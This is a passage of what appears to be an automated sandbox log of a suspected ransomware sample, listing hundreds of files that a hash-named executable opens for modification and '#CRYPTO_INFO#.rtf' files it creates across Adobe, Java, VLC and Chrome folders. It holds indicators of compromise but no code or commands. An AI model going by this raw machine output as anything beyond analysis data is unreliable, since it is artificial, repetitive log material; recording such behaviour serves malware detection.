(x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-files\js\nls\da-dk\ui-strings.js 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\features\org.eclipse.ecf.filetransfer.ssl.feature_1.0.0.v20140827-1444\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files\VideoLAN\VLC\lua\playlist\vocaroo.luac 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files\Mozilla Firefox\xul.dll.sig 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\AddressBook.png 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files\VideoLAN\VLC\lua\intf\luac.luac 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\app\dev\nls\fr-ma\ui-strings.js 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\sign-services-auth\js\nls\nb-no\ui-strings.js 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\app\dev\nls\sv-se\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\jre\bin\keytool.exe 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\bin\jhat.exe 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\features\org.eclipse.ecf.filetransfer.httpclient4.feature_3.9.1.v20140827-1444\epl-v10.html 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\combinepdf\js\nls\nb-no\ui-strings.js 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\editpdf\js\nls\nb-no\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\jre\lib\sound.properties 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\com.jrockit.mc.components.ui.ja_5.5.0.165303.jar 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\app\dev\nls\fi-fi\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\exportpdfupsell-app\images\themes\dark\rhp_world_icon_2x.png 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\generic-rhp-app\images\themes\dark\example_icons.png 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\digsig\js\nls\hr-hr\ui-strings.js 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\org.eclipse.ui.themes_1.0.1.v20140819-1717\plugin.properties 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\adobe_spinner_mini.gif 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\exportpdfupsell-app\images\themes\dark\example_icons.png 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\unified-share\js\nls\hr-hr\ui-strings.js 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\jre\lib\deploy.jar 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\app\dev\nls\uk-ua\ui-strings.js 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-files\js\nls\nl-nl\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\features\org.eclipse.ecf.core.feature_1.1.0.v20140827-1444\epl-v10.html 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files\Java\jre1.8.0_66\lib\ext\nashorn.jar 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\file_types\selection-actions.png 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\on-boarding\images\themeless\inline-error-2x.png 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\combinepdf\js\nls\eu-es\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\scan-files\images\themeless\Playstore\pl_get.svg 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\ob-preview\js\nls\uk-ua\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\plug_ins\Annotations\Stamps\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files\VideoLAN\VLC\README.txt 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files\VideoLAN\VLC\locale\lt\LC_MESSAGES\vlc.mo 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\exportpdfupsell-app\images\themes\dark\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-computer-select\js\nls\ui-strings.js 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\dd_arrow_small.png 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files\TraceUpdate.ppsm 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-computer-select\js\nls\nb-no\ui-strings.js 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\on-boarding\images\themeless\Download_on_the_App_Store_Badge_ko_135x40.svg 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Google\Chrome\Application\84.0.4147.89\Locales\es.pak 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\platform\modules\locale\org-netbeans-modules-masterfs_ja.jar 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\features\com.jrockit.mc.rcp.product_5.5.0.165303\feature.properties 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files\VideoLAN\VLC\locale\cgg\LC_MESSAGES\vlc.mo 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\on-boarding\images\themeless\improved-office-to-pdf-2x.png 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\sign-services-auth\js\nls\hr-hr\ui-strings.js 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\javax.el_2.2.0.v201303151357.jar 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\visualvm\modules\com-sun-tools-visualvm-charts.jar 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\app-center\images\themeless\mobile_scan_logo.svg 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files\VideoLAN\VLC\locale\kn\LC_MESSAGES\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\send-for-sign\js\nls\cs-cz\ui-strings.js 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\sample-files\js\nls\zh-cn\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\sign-services-auth\js\nls\nb-no\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\com.jrockit.mc.console.ui.notification_5.5.0.165303\html\dcommon\gifs\uarrow.gif 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\p2\org.eclipse.equinox.p2.core\cache\binary\com.jrockit.mc.rcp.product_root_5.5.0.165303 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files\Java\jre1.8.0_66\lib\ext\jaccess.jar 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files\VideoLAN\VLC\lua\playlist\koreus.luac 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\tracked-send\images\adobe_spinner.gif 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-computer-select\js\nls\da-dk\ui-strings.js 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\plug_ins\Annots.api 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\desktop-connector-files\js\nls\tr-tr\ui-strings.js 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\tracked-send\images\core_icons_retina.png 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\reviews\js\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\desktop-connector-files\js\nls\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\features\org.eclipse.babel.nls_eclipse_zh_4.4.0.v20140623020002\feature.properties 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\jre\lib\cmm\CIEXYZ.pf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\themes\dark\remove.svg 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\fss\img\tools\@1x\themes\dark\[email protected] 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\scan-files\images\themeless\Appstore\Download_on_the_App_Store_Badge_es_135x40.svg 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\unified-share\images\themes\dark\Info2x.png 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\features\org.eclipse.ecf.filetransfer.feature_3.9.0.v20140827-1444\META-INF\ECLIPSE_.SF 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-files\images\icons_ie8.gif 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files\VideoLAN\VLC\locale\az\LC_MESSAGES\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\unified-share\images\s_radio_selected_18.svg 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\activity-badge\js\nls\fr-fr\ui-strings.js 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-recent-files\js\nls\ja-jp\ui-strings.js 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-files\js\nls\eu-es\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\jre\bin\rmiregistry.exe 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\add-account-select\js\plugin.js 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-computer\images\themes\dark\virgo_mycomputer_folder_icon.svg 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\ob-preview\js\nls\en-gb\ui-strings.js 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\editpdf\js\nls\en-il\ui-strings.js 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\desktop.ini 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-recent-files\js\nls\da-dk\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\send-for-sign\js\nls\nl-nl\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\jre\COPYRIGHT 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\visualvm\modules\locale\com-sun-tools-visualvm-host-views_ja.jar 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\walk-through\js\nls\root\ui-strings.js 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\themes\dark\progress_spinner2x.gif 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\files\dev\nls\fr-ma\ui-strings.js 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\home\images\themes\dark\new_icons_retina.png 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\on-boarding\images\themeless\editvideoimage.png 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\ob-preview\js\nls\root\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\activity-badge\js\nls\root\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\fss\img\tools\@1x\[email protected] 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\signatures\images\themes\dark\share_icons.png 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\sample-files\js\nls\zh-tw\ui-strings.js 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\sample-files\js\nls\ui-strings.js 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\combinepdf\js\nls\fr-ma\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\com.jrockit.mc.flightrecorder.ui.ja_5.5.0.165303.jar 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\add-account\js\nls\zh-tw\ui-strings.js 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\s_export_18.svg 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Google\Chrome\Application\84.0.4147.89\Locales\sv.pak 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\org.eclipse.equinox.p2.publisher.eclipse.nl_zh_4.4.0.v20140623020002.jar 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\visualvm\modules\locale\com-sun-tools-visualvm-charts_zh_CN.jar 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\org.eclipse.ui.workbench.nl_zh_4.4.0.v20140623020002.jar 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\activity-badge\js\nls\hu-hu\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files\VideoLAN\VLC\lua\http\dialogs\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\uss-search\js\nls\ru-ru\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files\VideoLAN\VLC\locale\ta\LC_MESSAGES\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\platform\modules\locale\org-netbeans-modules-masterfs_zh_CN.jar 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\profiler\modules\org-netbeans-modules-profiler-oql.jar 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\digsig\js\nls\hu-hu\ui-strings.js 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\desktop-connector-files\js\nls\fr-fr\ui-strings.js 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\activity-badge\js\nls\da-dk\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\desktop-connector-files\js\nls\it-it\ui-strings.js 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\features\org.eclipse.equinox.p2.core.feature_1.3.0.v20140523-0116\META-INF\ECLIPSE_.SF 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\desktop-connector-files\js\nls\es-es\ui-strings.js 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-computer\js\nls\hu-hu\ui-strings.js 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files\VideoLAN\VLC\lua\playlist\appletrailers.luac 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\pages-app\js\nls\ui-strings.js 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\unified-share\images\SearchEmail2x.png 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\on-boarding\js\nls\es-es\ui-strings.js 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\reviews\js\nls\en-il\ui-strings.js 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created 